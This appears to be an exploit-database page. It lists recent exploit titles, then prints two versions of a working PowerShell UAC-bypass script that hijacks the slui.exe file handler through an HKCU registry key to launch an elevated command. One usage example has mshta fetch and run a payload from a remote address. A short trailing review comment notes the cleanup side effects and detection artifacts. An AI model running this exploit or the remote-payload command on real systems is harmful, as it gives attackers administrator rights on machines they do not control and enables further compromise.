
13 changes to exploits/shellcodes HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write Netperf 2.6.0 - Stack-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - Type Confusion Thunderbird ESR < 60.7.XXX - 'icalmemorystrdupanddequote' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'parser_get_next_char' Heap-Based Buffer Overflow Thunderbird ESR < 60.7.XXX - 'icalrecur_add_bydayrules' Stack-Based Buffer Overflow Exim 4.87 - 4.91 - Local Privilege Escalation Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell) AROX School-ERP Pro - Unauthenticated Remote Command Execution (Metasploit) RedwoodHQ 2.5.5 - Authentication Bypass CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities Spring Security OAuth - Open Redirector Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
Interactive Version:
|
|
|
|
<#
|
|
.SYNOPSIS
|
|
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
|
|
.NOTES
|
|
Function : SluiHijackBypass
|
|
File Name : SluiHijackBypass.ps1
|
|
Author : Gushmazuko
|
|
.LINK
|
|
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
|
|
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
|
|
.EXAMPLE
|
|
Load "cmd.exe" (By Default used 'arch 64'):
|
|
SluiHijackBypass -command "cmd.exe" -arch 64
|
|
|
|
Load "mshta http://192.168.0.30:4444/0HUGN"
|
|
SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
|
|
#>
|
|
|
|
function SluiHijackBypass(){
|
|
Param (
|
|
|
|
[Parameter(Mandatory=$True)]
|
|
[String]$command,
|
|
[ValidateSet(64,86)]
|
|
[int]$arch = 64
|
|
)
|
|
|
|
#Create registry structure
|
|
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
|
|
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
|
|
|
|
#Perform the bypass
|
|
switch($arch)
|
|
{
|
|
64
|
|
{
|
|
#x64 shell in Windows x64 | x86 shell in Windows x86
|
|
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
|
|
}
|
|
86
|
|
{
|
|
#x86 shell in Windows x64
|
|
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
|
|
}
|
|
}
|
|
|
|
#Remove registry structure
|
|
Start-Sleep 3
|
|
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
|
|
}
|
|
|
|
|
|
################################################################################
|
|
|
|
|
|
Non-Interactive Version:
|
|
|
|
<#
|
|
.SYNOPSIS
|
|
Noninteractive version of script, for directly execute.
|
|
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
|
|
.NOTES
|
|
File Name : SluiHijackBypass_direct.ps1
|
|
Author : Gushmazuko
|
|
.LINK
|
|
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
|
|
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
|
|
.EXAMPLE
|
|
Load "cmd.exe" (By Default used 'arch 64'):
|
|
powershell -exec bypass .\SluiHijackBypass_direct.ps1
|
|
#>
|
|
|
|
$program = "cmd.exe"
|
|
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
|
|
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
|
|
#For x64 shell in Windows x64:
|
|
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
|
|
#For x86 shell in Windows x64:
|
|
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
|
|
Start-Sleep 3
|
|
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force |
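Review bot: The comment-based help in both variants documents how to invoke the script but not what it changes on the host, and the final `Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force` deletes the whole per-user `exefile\shell` key rather than only the `open\command` subkey the script created, so any per-user handler values that existed before the run are lost as well. The cleanup also runs only if execution reaches it after the fixed `Start-Sleep 3`; if the script is interrupted earlier, the per-user `exefile` open command stays overridden for that account. I would add a `.NOTES` line such as `Side effects : overwrites HKCU:\Software\Classes\exefile\shell\open\command for the current user; cleanup removes the entire exefile\shell key` so anyone running this on a lab host knows what to restore. For detection, the same lines give the artifacts to monitor: a write to that HKCU key followed shortly by `slui.exe` being started with the `runas` verb.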